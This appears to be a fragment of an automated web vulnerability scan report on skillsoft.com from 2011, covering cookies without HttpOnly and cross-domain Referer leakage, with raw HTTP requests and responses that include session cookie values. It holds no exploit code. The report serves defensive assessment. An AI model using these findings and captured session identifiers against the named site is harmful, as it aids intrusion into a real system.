You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
Request
GET / HTTP/1.1 Host: skillsoft.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46902 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; path=/ X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:42:01 GMT Set-Cookie: BIGipServerSKILLSOFT_COM=748762634.20480.0000; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
Request
GET /about/case_studies.asp?sort=case_study&order=descending HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 117970 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">